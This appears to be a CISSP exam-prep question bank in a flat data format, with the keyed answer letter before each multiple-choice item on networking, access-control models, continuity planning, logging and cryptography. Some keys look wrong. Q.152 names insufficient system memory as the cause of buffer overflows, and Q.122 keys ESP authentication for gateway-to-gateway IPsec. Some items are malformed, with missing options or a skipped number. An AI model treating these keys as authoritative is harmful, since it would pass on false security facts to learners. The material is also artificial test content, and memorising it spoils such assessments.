A#CISSP1 Q.96: Which of the following is true related to network sniffing? 	^A: Sniffers allow an attacker to monitor data passing across a network.	^B: Sniffers alter the source address of a computer to disguise and exploit weak authentication methods.	^C: Sniffers take over network connections.	^D: Sniffers send IP fragments to a system that overlap with each other.
A#CISSP1 Q.97: Which of the following protocols is not implemented at the Internet layer of the TCP/IP protocol model? 	^A: User datagram protocol (UDP)	^B: Internet protocol (IP)	^C: Address resolution protocol (ARP)	^D: Internet control message protocol (ICMP)
B#CISSP1 Q.98: Which of the following is used to help business units understand the impact of a disruptive event? 	^A: A risk analysis.	^B: A business impact assessment.	^C: A vulnerability assessment.	^D: A disaster recovery plan.
B#CISSP1 Q.99: A contingency plan should address? 	^A: Potential risks	^B: Residual risks	^C: Identified risks	^D: All of the above
A#CISSP1 Q.100: In the OSI/ISO model, at what level is SET (SECURE ELECTRONIC TRANSACTION PROTOCOL) provided? 	^A: Application	^B: Network	^C: Presentation	^D: Session
A#CISSP1 Q.101: A packet filtering firewall looks at the data packet to get information about the source and destination addresses of an incoming packet, the session's communications protocol (TCP, UDP or ICMP), and the source and destination application port for the? 	^A: Desired service	^B: Dedicated service	^C: Delayed service	^D: Distributed service.
A#CISSP1 Q.102: A packet filtering firewall system is considered a? 	^A: First generation firewall.	^B: Second generation firewall.	^C: Third generation firewall.	^D: Fourth generation firewall.
D#CISSP1 Q.103: When should a post-mortem review meeting be held after an intrusion has been properly taken care of? 	^A: Within the first three months after the investigation of the intrusion is completed.	^B: Within the first week after prosecution of intruders has taken place, whether successful or not.	^C: Within the first month after the investigation of the intrusion is completed.	^D: Within the first week of completing the investigation of the intrusion.
A#CISSP1 Q.104: Which of the following can be used as a covert channel?	^A: Storage and timing.	^B: Storage and low bits.	^C: Storage and permissions.	^D: Storage and classification.
C#CISSP1 Q.105: Which software development model is actually a meta-model that incorporates a number of the software development models? 	^A: The Waterfall model.	^B: The modified Waterfall model.	^C: The Spiral model.	^D: The Critical Patch Model (CPM).
B#CISSP1 Q.106: What is not true with pre-shared key authentication within IKE / IPsec protocol: 	^A: Pre-shared key authentication is normally based on simple passwords.	^B: Needs a PKI to work.	^C: Only one pre-shared key for all VPN connections is needed.	^D: Costly key management on large user groups.
D#CISSP1 Q.107: Which statement is NOT true concerning Application Control? 	^A: It limits end users of applications in such a way that only particular screens are visible.	^B: Only specific records can be requested choice.	^C: Particular uses of the application can be recorded for audit purposes.	^D: Is non-transparent to the endpoint applications so changes are needed to the applications involved.
C#CISSP1 Q.108: In order to ensure the privacy and integrity of the data, connections between firewalls over public networks should use? 	^A: Screened subnets	^B: Digital certificates	^C: Encrypted Virtual Private Networks	^D: Encryption
D#CISSP1 Q.109: What is necessary for a subject to have write access to an object in a Multi-Level Security Policy? 	^A: The subject's sensitivity label must dominate the object's sensitivity label.	^B: The subject's sensitivity label subordinates the object's sensitivity label.	^C: The subject's sensitivity label is subordinated by the object's sensitivity label.	^D: The subject's sensitivity label is dominated by the object's sensitivity label.
B#CISSP1 Q.110: What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own bank account? 	^A: Data fiddling	^B: Data diddling	^C: Data hiding	^D: Data masking
A#CISSP1 Q.111: Which of the following is unlike the other three? 	^A: El Gamal	^B: Teardrop	^C: Buffer Overflow	^D: Smurf
D#CISSP1 Q.112: Phreakers are hackers who specialize in telephone fraud. What type of telephone fraud manipulates the line voltage to receive a toll-free call? 	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
D#CISSP1 Q.113: Which of the following groups represents the leading source of computer crime losses? 	^A: Hackers	^B: Industrial saboteurs	^C: Foreign intelligence officers	^D: Employees
A#CISSP1 Q.114: Which of the following steps should be performed first in a business impact analysis (BIA)? 	^A: Identify all business units within the organization.	^B: Evaluate the impact of disruptive events.	^C: Estimate the Recovery Time Objectives (RTO).	^D: Evaluate the criticality of business functions.
C#CISSP1 Q.115: Which of the following embodies all the detailed actions that personnel are required to follow? 	^A: Standards	^B: Guidelines	^C: Procedures	^D: Baselines
D#CISSP1 Q.116: Immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases) is? 	^A: Coaxial cable	^B: Twisted Pair cable	^C: Axial cable	^D: Fiber Optic cable
A#CISSP1 Q.117: Which of the following is the most reliable, secure means of removing data from magnetic storage media such as a magnetic tape, or cassette? 	^A: Degaussing	^B: Parity Bit Manipulation	^C: Certification	^D: Buffer overflow
A#CISSP1 Q.118: Which of the following is an advantage of prototyping? 	^A: Prototype systems can provide significant time and cost savings.	^B: Change control is often less complicated with prototype systems.	^C: It ensures that functions or extras are not added to the intended system.	^D: Strong internal controls are easier to implement.
A#CISSP1 Q.119: The IS security analyst's participation in which of the following system development life cycle phases provides maximum benefit to the organization? 	^A: System requirements definition.	^B: System design.	^C: Program development.	^D: Program testing.
C#CISSP1 Q.120: Controls are implemented to? 	^A: Eliminate risk and reduce the potential for loss.	^B: Mitigate risk and eliminate the potential for loss.	^C: Mitigate risk and reduce the potential for loss.	^D: Eliminate risk and eliminate the potential for loss.
A#CISSP1 Q.121: A circuit level gateway is ________ when compared to an application level firewall. 	^A: Easier to maintain.	^B: More difficult to maintain.	^C: More secure.	^D: Slower
C#CISSP1 Q.122: In IPSec, if the communication mode is gateway-gateway or host-gateway: 	^A: Only tunnel mode can be used.	^B: Only transport mode can be used.	^C: Encapsulating Security Payload (ESP) authentication must be used.	^D: Both tunnel and transport mode can be used.
C#CISSP1 Q.123: Which integrity model defines a constrained data item, an integrity verification procedure and a transformation procedure? 	^A: The Take-Grant model	^B: The Biba integrity model	^C: The Clark Wilson integrity model	^D: The Bell-LaPadula integrity model
A#CISSP1 Q.124: Which of the following rules pertaining to a Business Continuity Plan/Disaster Recovery Plan is incorrect? 	^A: In order to facilitate recovery, a single plan should cover all locations.	^B: There should be requirements to form a committee to decide a course of action. These decisions should be made ahead of time and incorporated into the plan.	^C: In its procedures and tasks, the plan should refer to functions, not specific individuals.	^D: Critical vendors should be contacted ahead of time to validate equipment can be obtained in a timely manner.
C#CISSP1 Q.125: What are suitable protocols for securing VPN connections? 	^A: S/MIME and SSH	^B: TLS and SSL	^C: IPsec and L2TP	^D: PKCS and X.509
D#CISSP1 Q.126: Which of the following questions is less likely to help in assessing identification and authentication controls? 	^A: Is a current list maintained and approved of authorized users and their access?	^B: Are passwords changed at least every ninety days or earlier if needed?	^C: Are inactive user identifications disabled after a specified period of time?	^D: Is there a process for reporting incidents?
B#CISSP1 Q.127: The primary purpose for using one-way encryption of user passwords within a system is which of the following? 	^A: It prevents an unauthorized person from trying multiple passwords in one logon attempt.	^B: It prevents an unauthorized person from reading or modifying the password list.	^C: It minimizes the amount of storage required for user passwords.	^D: It minimizes the amount of processing time used for encrypting passwords.
D#CISSP1 Q.128: The security of a computer application is most effective and economical in which of the following cases? 	^A: The system is optimized prior to the addition of security.	^B: The system is procured off-the-shelf.	^C: The system is customized to meet the specific security threat.	^D: The system is designed originally to provide the necessary security.
D#CISSP1 Q.129: In the following choices there is one that is a typical biometric characteristic that is not used to uniquely authenticate an individual's identity? 	^A: Retina scans	^B: Iris scans	^C: Palm scans	^D: Skin scans
A#CISSP1 Q.130: Which of the following proves or disproves a specific act through oral testimony based on information gathered through the witness's five senses? 	^A: Direct evidence	^B: Circumstantial evidence	^C: Conclusive evidence	^D: Corroborative evidence
B#CISSP1 Q.131: Which of the following would be defined as an absence of safeguard that could be exploited? 	^A: A threat	^B: A vulnerability	^C: A risk	^D: An exposure
D#CISSP1 Q.132: Which of the following is a LAN transmission protocol? 	^A: Ethernet	^B: Ring topology	^C: Unicast	^D: Polling
B#CISSP1 Q.133: Why would a database be denormalized?	^A: To ensure data integrity.	^B: To increase processing efficiency.	^C: To prevent duplication of data.	^D: To save storage space.
C#CISSP1 Q.134: Under "Named Perils" form of Property insurance 	^A: Burden of proof that particular loss is covered is on Insurer.	^B: Burden of proof that particular loss is not covered is on Insurer.	^C: Burden of proof that particular loss is covered is on Insured.	^D: Burden of proof that particular loss is not covered is on Insured.
C#CISSP1 Q.135: The following is not true:	^A: Since the early days of mankind humans have struggled with the problems of protecting assets.	^B: The addition of a PIN keypad to the card reader was a solution to unreported card or lost card problem.	^C: There has never been a problem of lost keys.	^D: Human guard is an inefficient and sometimes ineffective method of protecting resources.
C#CISSP1 Q.136: Which of the following statements pertaining to software testing approaches is correct? 	^A: A bottom-up approach allows interface errors to be detected earlier.	^B: A top-down approach allows errors in critical modules to be detected earlier.	^C: The test plan and results should be retained as part of the system's permanent documentation.	^D: Black box testing is predicated on a close examination of procedural detail.
C#CISSP1 Q.137: Which Orange Book evaluation level is described as "Structured Protection"? 	^A: A1	^B: B3	^C: B2	^D: B1
C#CISSP1 Q.138: Which of the following questions should any user not be able to answer regarding their organization information security policy? ^A: Who is involved in establishing the security policy?	^B: Where is the organization security policy defined?	^C: What are the actions that need to be performed in case of a disaster?	^D: Who is responsible for monitoring compliance to the organization security policy?
A#CISSP1 Q.139: RAID Level 1 mirrors the data from one disk to a set of disks using which of the following techniques? 	^A: Copying the data onto another disk or set of disks.	^B: Moving the data onto another disk or set of disks.	^C: Establishing dual connectivity to another disk or set of disks.	^D: Establishing dual addressing to another disk or set of disks.
A#CISSP1 Q.140: Which type of firewall can be used to track connectionless protocols such as UDP and RPC? 	^A: Stateful inspection firewalls	^B: Packet filtering firewalls	^C: Application level firewalls	^D: Circuit level firewalls
C#CISSP1 Q.141: Which of the following items should not be retained in an E-mail directory? 	^A: Drafts of documents.	^B: Copies of documents.	^C: Permanent records.	^D: Temporary documents.
C#CISSP1 Q.142: Which of the following department managers would be best suited to oversee the development of an information security policy? 	^A: Information systems	^B: Human resources	^C: Business operations	^D: Security administration
B#CISSP1 Q.143: Which of the following countermeasures is not appropriate for war dialing attacks? 	^A: Monitoring and auditing for such activity.	^B: Disabling call forwarding.	^C: Making sure only necessary phone numbers are made public.	^D: Using completely different numbers for voice and data accesses.
B#CISSP1 Q.144: Which of the following tools is less likely to be used by a hacker? 	^A: L0phtcrack	^B: Tripwire	^C: Crack	^D: John the Ripper
A#CISSP1 Q.145: Which of the following logical access exposures involves changing data before, or as it is entered into the computer? 	^A: Data diddling	^B: Salami techniques	^C: Trojan horses	^D: Viruses
B#CISSP1 Q.146: Which of the following computer aided software engineering (CASE) products is used for developing detailed designs, such as screen and report layouts? ^A: Lower CASE	^B: Middle CASE	^C: Upper CASE	^D: I-CASE
C#CISSP1 Q.147: What is the number of columns in a table called? 	^A: Schema	^B: Relation	^C: Degree	^D: Cardinality
B#CISSP1 Q.148: Which of the following is the most reliable authentication device? 	^A: Variable callback system	^B: Smart Card system	^C: Fixed callback system	^D: Combination of variable and fixed callback system.
C#CISSP1 Q.149: Which of the following firewall rules is less likely to be found on a firewall installed between an organization's internal network and the Internet? 	^A: Permit all traffic to and from local host.	^B: Permit all inbound ssh traffic	^C: Permit all inbound tcp connections.	^D: Permit all syslog traffic to log-server.abc.org.
B#CISSP1 Q.150: The Internet can be utilized by either? 	^A: Public or private networks (with a Virtual Private Network).	^B: Private or public networks (with a Virtual Private Network).	^C: Home or private networks (with a Virtual Private Network).	^D: Public or home networks (with a Virtual Private Network).
A#CISSP1 Q.151: This backup method must be made regardless of whether Differential or Incremental methods are used: 	^A: Full Backup Method	^B: Incremental backup method	^C: Differential backup method	^D: Tape backup method
D#CISSP1 Q.152: Why do buffer overflows happen? 	^A: Because buffers can only hold so much data.	^B: Because input data is not checked for appropriate length at time of input.	^C: Because they are an easy weakness to exploit.	^D: Because of insufficient system memory.
C#CISSP1 Q.153: Which of the following should not be performed by an operator? 	^A: Mounting disk or tape	^B: Backup and recovery	^C: Data entry	^D: Handling hardware
C#CISSP1 Q.154: What security model is dependent on security labels? 	^A: Discretionary access control	^B: Label-based access control	^C: Mandatory access control	^D: Non-discretionary access control
A#CISSP1 Q.155: Detection capabilities of Host-based ID systems are limited by the incompleteness of which of the following? 	^A: Audit log capabilities	^B: Event capture capabilities	^C: Event triage capabilities	^D: Audit notification capabilities
B#CISSP1 Q.156: Computer crime is generally made possible by which of the following? 	^A: The perpetrator obtaining training & special knowledge.	^B: Victim carelessness.	^C: Collusion with others in information processing	^D: System design flaws.
A#CISSP1 Q.157: The structures, transmission methods, transport formats, and security measures that are used to provide integrity, availability, authentication, and confidentiality for transmissions over private and public communications networks and media includes? 	^A: The Telecommunications and Network Security domain.	^B: The Telecommunications and Netware Security domain.	^C: The Technical communications and Network Security domain.	^D: The Telnet and Network Security domain.
A#CISSP1 Q.158: Which of the following is the lowest TCSEC class wherein the system must be protected against covert storage channels (but not necessarily covert timing channels)? 	^A: B2	^B: B1	^C: B3	^D: A1
C#CISSP1 Q.159: Which type of control is concerned with avoiding occurrences of risks? 	^A: Deterrent controls	^B: Detective controls	^C: Preventive controls	^D: Compensating controls
A#CISSP1 Q.160: The basic function of an FRDS is to? 	^A: Protect file servers from data loss and a loss of availability due to disk failure.	^B: Persistent file servers from data gain and a gain of availability due to disk failure.	^C: Prudent file servers from data loss and a loss of acceptability due to disk failure.	^D: Packet file servers from data loss and a loss of accountability due to disk failure.
D#CISSP1 Q.161: Which of the following protocols does not operate at the data link layer (layer 2)? 	^A: PPP	^B: RARP	^C: L2F	^D: ICMP
A#CISSP1 Q.162: This tape format can be used to backup data systems in addition to its original intended audio use: 	^A: Digital Audio tape (DAT)	^B: Digital video tape (DVT)	^C: Digital Casio Tape (DCT)	^D: Digital Voice Tape (DVT)
C#CISSP1 Q.163: By examining the "state" and "context" of the incoming data packets, it helps to track the protocols that are considered "connectionless", such as UDP-based applications and Remote Procedure Calls (RPC). This type of firewall system is used in? 	^A: First generation firewall systems.	^B: Second generation firewall systems.	^C: Third generation firewall systems.	^D: Fourth generation firewall systems.
A#CISSP1 Q.164: Guards are appropriate whenever the function required by the security program involves which of the following?	^A: The use of discriminating judgment.	^B: The use of physical force.	^C: The operation of access control devices.	^D: The need to detect unauthorized access.
A#CISSP1 Q.165: A server cluster looks like a? 	^A: Single server from the user's point of view.	^B: Dual server from the user's point of view.	^C: Triple server from the user's point of view.	^D: Quadruple server from the user's point of view.
D#CISSP1 Q.166: Which of the following are functions that are compatible in a properly segregated environment? 	^A: Application programming and computer operation.	^B: System programming and job control analysis.	^C: Access authorization and database administration.	^D: System development and systems maintenance.
B#CISSP1 Q.167: Encryption is applicable to all of the following OSI/ISO layers except: 	^A: Network layer	^B: Physical layer	^C: Session layer	^D: Data link layer
A#CISSP1 Q.168: The Computer Security Policy Model the Orange Book is based on is which of the following? 	^A: Bell-LaPadula	^B: Data Encryption Standard	^C: Kerberos	^D: Tempest
A#CISSP1 Q.169: Which type of attack would a competitive intelligence attack best classify as?	^A: Business attack	^B: Intelligence attack	^C: Financial attack	^D: Grudge attack
C#CISSP1 Q.170: Which of the following is responsible for the most security issues? 	^A: Outside espionage	^B: Hackers	^C: Personnel	^D: Equipment failure
A#CISSP1 Q.171: Which of the following goals is NOT a goal of Problem Management? 	^A: To eliminate all problems.	^B: To reduce failures to a manageable level.	^C: To prevent the occurrence or re-occurrence of a problem.	^D: To mitigate the negative impact of problems on computing services and resources.
D#CISSP1 Q.172: Examples of types of physical access controls include all except which of the following? 	^A: badges	^B: locks	^C: guards	^D: passwords
C#CISSP1 Q.173: Which of the following statements pertaining to the (ISC)2 Code of Ethics is incorrect? 	^A: All information systems security professionals who are certified by (ISC)2 recognize that such a certification is a privilege that must be both earned and maintained.	^B: All information systems security professionals who are certified by (ISC)2 shall provide diligent and competent service to principals.	^C: All information systems security professionals who are certified by (ISC)2 shall discourage such behavior as associating or preparing to associate with criminals or criminal behavior.	^D: All information systems security professionals who are certified by (ISC)2 shall promote the understanding and acceptance of prudent information security measures.
C#CISSP1 Q.174: Which DES modes can best be used for authentication? 	^A: Cipher Block Chaining and Electronic Code Book.	^B: Cipher Block Chaining and Output Feedback.	^C: Cipher Block Chaining and Cipher Feedback.	^D: Output Feedback and Electronic Code Book.
A#CISSP1 Q.175: In the OSI / ISO model, at what layer are some of the SLIP, CSLIP, PPP control functions provided? 	^A: Link	^B: Transport	^C: Presentation	^D: Application
B#CISSP1 Q.176: Which of the following best describes the purpose of debugging programs? 	^A: To generate random data that can be used to test programs before implementing them	^B: To ensure that program coding flaws are detected and corrected.	^C: To protect, during the programming phase, valid changes from being overwritten by other changes.	^D: To compare source code versions before transferring to the test environment.
A#CISSP1 Q.177: With RAID Level 5 the spare drives that replace the failed drives are usually hot swappable, meaning they can be replaced on the server while the? 	^A: System is up and running.	^B: System is down and running.	^C: System is in-between and running.	^D: System is centre and running.
A#CISSP1 Q.178: What is the process that RAID Level 0 uses as it creates one large disk by using several disks? 	^A: Striping	^B: Mirroring	^C: Integrating	^D: Clustering
A#CISSP1 Q.179: Which of the following is used to create and delete views and relations within tables? 	^A: SQL Data Definition Language	^B: SQL Data Manipulation Language	^C: SQL Data Relational Language	^D: SQL Data Identification Language
B#CISSP1 Q.180: Which division of the Orange Book deals with discretionary protection (need-to-know)? 	^A: D	^B: C	^C: B	^D: A
C#CISSP1 Q.181: The Diffie-Hellman algorithm is used for? 	^A: Encryption	^B: Digital signature	^C: Key exchange	^D: Non-repudiation
A#CISSP1 Q.182: Primarily run when time and tape space permits, and is used for the system archive or baselined tape sets is the?	^A: Full backup method.	^B: Incremental backup method.	^C: Differential backup method.	^D: Tape backup method.
C#CISSP1 Q.183: Which of the following teams should not be included in an organization's contingency plan? 	^A: Damage assessment team.	^B: Hardware salvage team.	^C: Tiger team.	^D: Legal affairs team.
B#CISSP2 Q.1:  Covert channel is a communication channel that can be used for:	^A: Hardening the system.	^B: Violating the security policy.	^C: Protecting the DMZ.	^D: Strengthening the security policy.
C#CISSP2 Q.2:  To ensure that integrity is attained through the Clark and Wilson model, certain rules are needed. These rules are:	^A: Processing rules and enforcement rules.	^B: Integrity-bouncing rules.	^C: Certification rules and enforcement rules.	^D: Certification rules and general rules.
D#CISSP2 Q.3:  What was introduced for circumventing difficulties in classic approaches to computer security by limiting damage produced by malicious programs?	^A: Integrity-preserving	^B: Ref Mon	^C: Integrity-monitoring	^D: Non-Interference
A#CISSP2 Q.4:  What is an indirect way to transmit information with no explicit reading of confidential information?	^A: Covert channels	^B: Backdoor	^C: Timing channels	^D: Overt channels
B#CISSP2 Q.5:  Which of the following are the limitations of the BLP model? 	^A: No policies for changing access data control.	^B: All of the choices.	^C: Contains covert channels.	^D: Static in nature.
B#CISSP2 Q.6:  Which of the following are the two most well known access control models? 	^A: Lattice and Biba	^B: Bell LaPadula and Biba	^C: Bell LaPadula and Chinese Wall	^D: Bell LaPadula and Info Flow
A#CISSP2 Q.7:  What can be defined as a formal security model for the integrity of subjects and objects in a system? 	^A: Biba	^B: Bell LaPadula	^C: Lattice	^D: Info Flow
D#CISSP2 Q.8:  Which of the following is best known for capturing security requirements of commercial applications? 	^A: Lattice	^B: Biba	^C: Bell LaPadula	^D: Clark and Wilson
B#CISSP2 Q.9:  The Clark Wilson model has its emphasis on: 	^A: Security	^B: Integrity	^C: Accountability	^D: Confidentiality
B#CISSP2 Q.10:  Which of the following is a state machine model capturing confidentiality aspects of access control? 	^A: Clarke Wilson	^B: Bell-LaPadula	^C: Chinese Wall	^D: Lattice
C#CISSP2 Q.11:  With the BLP model, access permissions are defined through: 	^A: Filter rules	^B: Security labels	^C: Access Control matrix	^D: Profiles
B#CISSP2 Q.12:  With the BLP model, security policies prevent information flowing downwards from a: 	^A: Low security level	^B: High security level	^C: Medium security level	^D: Neutral security level
D#CISSP2 Q.13:  When will BLP consider the information flow that occurs? 	^A: When a subject alters an object.	^B: When a subject accesses an object.	^C: When a subject observes an object.	^D: All of the choices.
C#CISSP2 Q.14:  Separation of duties is valuable in deterring: 	^A: DoS	^B: external intruder	^C: fraud	^D: trojan horse
C#CISSP2 Q.15:  What principle requires that for particular sets of transactions, no single individual be allowed to execute all transactions within the set? 	^A: Use of rights	^B: Balance of power	^C: Separation of duties	^D: Fair use
D#CISSP2 Q.16:  Separation of duty can be: 	^A: Dynamic only	^B: Encrypted	^C: Static only	^D: Static or dynamic
A#CISSP2 Q.17:  Who should determine the appropriate sensitivity classifications of information? 	^A: Owner	^B: Server	^C: Administrator	^D: User
A#CISSP2 Q.18:  Who should determine the appropriate access control of information? 	^A: Owner	^B: User	^C: Administrator	^D: Server
D#CISSP2 Q.19:  What principle requires that a user be given no more privilege than necessary to perform a job? 	^A: Principle of aggregate privilege.	^B: Principle of most privilege.	^C: Principle of effective privilege.	^D: Principle of least privilege.
B#CISSP2 Q.20:  To ensure least privilege requires that __________ is identified. 	^A: what the user's privilege owns	^B: what the user's job is	^C: what the user's cost is	^D: what the user's group is
B#CISSP2 Q.21:  The concept of least privilege currently exists within the context of: 	^A: ISO	^B: TCSEC	^C: OSI	^D: IETF
B#CISSP2 Q.22:  Enforcing minimum privileges for general system users can be easily achieved through the use of: 	^A: TSTEC	^B: RBAC	^C: TBAC	^D: IPSEC
B#CISSP2 Q.23:  Which of the following are potential firewall problems that should be logged? 	^A: Reboot	^B: All of the choices.	^C: Proxies restarted.	^D: Changes to configuration file.
A#CISSP2 Q.24:  Which of the following are security events on Unix that should be logged? 	^A: All of the choices.	^B: Use of Setgid.	^C: Change of permissions on system files.	^D: Use of Setuid.
B#CISSP2 Q.25:  What process determines who is trusted for a given purpose? 	^A: Identification	^B: Authorization	^C: Authentication	^D: Accounting
B#CISSP2 Q.26:  Which of the following tools can you use to assess your network's vulnerability? 	^A: ISS	^B: All of the choices.	^C: SATAN	^D: Ballista
D#CISSP2 Q.27:  Which of the following should NOT be logged for performance problems? 	^A: CPU load.	^B: Percentage of use.	^C: Percentage of idle time.	^D: None of the choices.
A#CISSP2 Q.28:  Which of the following should be logged for security problems? 	^A: Use of mount command.	^B: Percentage of idle time.	^C: Percentage of use.	^D: None of the choices.
B#CISSP2 Q.29:  Which of the following services should be logged for security purpose? 	^A: bootp	^B: All of the choices.	^C: sunrpc	^D: tftp
D#CISSP2 Q.30:  Who should NOT have access to the log files? 	^A: Security staff.	^B: Internal audit staff.	^C: System administration staff.	^D: Manager's secretary.
C#CISSP2 Q.31:  Which of the following correctly describe the use of the collected logs? 	^A: They are used in the passive monitoring process only.	^B: They are used in the active monitoring process only.	^C: They are used in the active and passive monitoring process.	^D: They are used in the archiving process only.
C#CISSP2 Q.32:  All logs are kept on archive for a period of time. What determines this period of time? 	^A: Administrator preferences.	^B: MTTR	^C: Retention policies	^D: MTTF
C#CISSP2 Q.33:  Logs must be secured to prevent: 	^A: Creation, modification, and destruction.	^B: Modification, deletion, and initialization.	^C: Modification, deletion, and destruction.	^D: Modification, deletion, and inspection.
A#CISSP2 Q.34:  To ensure dependable and secure logging, all computers must have their clock synchronized to: 	^A: A central timeserver.	^B: The log time stamp.	^C: The respective local times.	^D: None of the choices.
B#CISSP2 Q.35:  To ensure dependable and secure logging, logging information traveling on the network should be: 	^A: Stored	^B: Encrypted	^C: Isolated	^D: Monitored
A#CISSP2 Q.36:  The activity that consists of collecting information that will be used for monitoring is called: 	^A: Logging	^B: Troubleshooting	^C: Auditing	^D: Inspecting
B#CISSP2 Q.37:  How often should logging be run? 	^A: Once every week.	^B: Always	^C: Once a day.	^D: During maintenance.
A#CISSP2 Q.38:  If the computer system being used contains confidential information, users must not: 	^A: Leave their computer without first logging off.	^B: Share their desks.	^C: Encrypt their passwords.	^D: Communicate
A#CISSP2 Q.39:  Security is a process that is: 	^A: Continuous	^B: Indicative	^C: Examined	^D: Abnormal
C#CISSP2 Q.40:  Which of the following user items can be shared? 	^A: Password	^B: Home directory	^C: None of the choices.
B#CISSP2 Q.41:  Root login should only be allowed via:	^A: Rsh	^B: System console	^C: Remote program	^D: VNC
B#CISSP2 Q.42:  What should you do to the user accounts as soon as employment is terminated? 	^A: Disable the user accounts and erase immediately the data kept.	^B: Disable the user accounts and have the data kept for a specific period of time.	^C: None of the choices.	^D: Maintain the user accounts and have the data kept for a specific period of time.
D#CISSP2 Q.43:  Access to the _________ account on a Unix server must be limited to only the system administrators that must absolutely have this level of access. 	^A: Superuser of inetd.	^B: Manager or root.	^C: Fsf or root	^D: Superuser or root.
D#CISSP2 Q.44:  Which of the following correctly describe good security practice? 	^A: Accounts should be monitored regularly.	^B: You should have a procedure in place to verify password strength.	^C: You should ensure that there are no accounts without passwords.	^D: All of the choices.
A#CISSP2 Q.45:  LOMAC is a security enhancement for what operating system? 	^A: Linux	^B: Netware	^C: Solaris
B#CISSP2 Q.46:  LOMAC uses what Access Control method to protect the integrity of processes and data? 	^A: Linux based EFS.	^B: Low Water-Mark Mandatory Access Control.	^C: Linux based NFS.	^D: High Water-Mark Mandatory Access Control.
D#CISSP2 Q.47:  On Linux, LOMAC is implemented as: 	^A: Virtual addresses	^B: Registers	^C: Kernel built in functions	^D: Loadable kernel module
B#CISSP2 Q.49:  What is the method of coordinating access to resources based on the listing of permitted IP addresses? 	^A: MAC	^B: ACL	^C: DAC	^D: None of the choices.
A#CISSP2 Q.50:  With RBAC, each user can be assigned: 	^A: One or more roles.	^B: Only one role.	^C: A token role.	^D: A security token.
C#CISSP2 Q.51:  With RBAC, roles are: 	^A: Based on labels.	^B: All equal	^C: Hierarchical	^D: Based on flows.
C#CISSP2 Q.52:  With __________, access decisions are based on the roles that individual users have as part of an organization. 	^A: Server based access control.	^B: Rule based access control.	^C: Role based access control.	^D: Token based access control.
C#CISSP2 Q.53:  Under Role based access control, access rights are grouped by: 	^A: Policy name	^B: Rules	^C: Role name	^D: Sensitivity label
C#CISSP2 Q.54:  Which of the following will you consider as a role under a role based access control system? 	^A: Bank rules	^B: Bank computer	^C: Bank teller	^D: Bank network
B#CISSP2 Q.55:  Role based access control is attracting increasing attention particularly for what applications? 	^A: Scientific	^B: Commercial	^C: Security	^D: Technical
D#CISSP2 Q.56:  What is one advantage of deploying Role based access control in large networked applications? 	^A: Higher security	^B: Higher bandwidth	^C: User friendliness	^D: Lower cost
B#CISSP2 Q.57:  DAC and MAC policies can be effectively replaced by: 	^A: Rule based access control.	^B: Role based access control.	^C: Server based access control.	^D: Token based access control
B#CISSP2 Q.58:  Which of the following correctly describe Role based access control? 	^A: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your user profile groups.	^B: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your organization's structure.	^C: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ticketing system.	^D: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ACL.
D#CISSP2 Q.59:  Which of the following RFC talks about Rule Based Security Policy? 	^A: 1316 ^B: 1989	^C: 2717	^D: 2828
A#CISSP2 Q.60:  With Rule Based Security Policy, a security policy is based on: 	^A: Global rules imposed for all users.	^C: Global rules imposed for nobody.	^D: Global rules imposed for only the local users.
C#CISSP2 Q.61:  With Rule Based Security Policy, global rules usually rely on comparison of the _______ of the resource being accessed. 	^A: A group of users.	^B: Users	^C: Sensitivity	^D: Entities
C#CISSP2 Q.62:  What control is based on a specific profile for each user? 	^A: Lattice based access control.	^B: Directory based access control.	^C: Rule based access control.	^D: ID based access control.
A#CISSP2 Q.63:  In a very large environment, which of the following is an administrative burden? 	^A: Rule based access control.	^B: Directory based access control.	^C: Lattice based access control	^D: ID based access control
A#CISSP2 Q.64:  Which of the following is a feature of the Rule based access control? 	^A: The use of profile.	^B: The use of information flow label.	^C: The use of data flow diagram.	^D: The use of token.
D#CISSP2 Q.65:  A firewall can be classified as a: 	^A: Directory based access control.	^B: Rule based access control.	^C: Lattice based access control.	^D: ID based access control.
C#CISSP2 Q.66:  The Lattice Based Access Control model was developed MAINLY to deal with: 	^A: Affinity	^B: None of the choices.	^C: Confidentiality	^D: Integrity
B#CISSP2 Q.67:  With the Lattice Based Access Control model, a security class is also called a: 	^A: Control factor	^B: Security label	^C: Mandatory number	^D: Serial ID
A#CISSP2 Q.68:  Under the Lattice Based Access Control model, a container of information is a(n): 	^A: Object	^B: Model	^C: Label
A#CISSP2 Q.69:  What Access Control model was developed to deal mainly with information flow in computer systems? 	^A: Lattice Based	^B: Integrity Based	^C: Flow Based	^D: Area Based
B#CISSP2 Q.70:  The Lattice Based Access Control model was developed to deal mainly with ___________ in computer systems. 	^A: Access control	^B: Information flow	^C: Message routes	^D: Encryption
B#CISSP2 Q.71:  In the Lattice Based Access Control model, controls are applied to: 	^A: Scripts	^B: Objects	^C: Models	^D: Factors
C#CISSP2 Q.72:  With Discretionary access controls, who determines who has access and what privilege they have? 	^A: End users.	^B: None of the choices.	^C: Resource owners.	^D: Only the administrators.
A#CISSP2 Q.73:  What defines an imposed access control level? 	^A: MAC	^B: DAC	^C: SAC	^D: CAC
B#CISSP2 Q.74:  Under MAC, who can change the category of a resource? 	^A: All users.	^B: Administrators only.	^C: All managers.	^D: None of the choices.
A#CISSP2 Q.75:  Under MAC, who may grant a right of access that is explicitly forbidden in the access control policy? 	^A: None of the choices.	^B: All users.	^C: Administrators only.	^D: All managers.
B#CISSP2 Q.76:  You may describe MAC as: 	^A: Opportunistic	^B: Prohibitive	^C: None of the choices.	^D: Permissive	
B#CISSP2 Q.77:  Under MAC, which of the following is true? 	^A: All that is expressly permitted is forbidden.	^B: All that is not expressly permitted is forbidden.	^C: All that is not expressly permitted is not forbidden.	^D: None of the choices.
C#CISSP2 Q.78:  Under MAC, a clearance is a: 	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
D#CISSP2 Q.79:  Under MAC, a file is a(n): 	^A: Privilege	^B: Subject	^C: Sensitivity	^D: Object
A#CISSP2 Q.80:  Under MAC, classification reflects: 	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
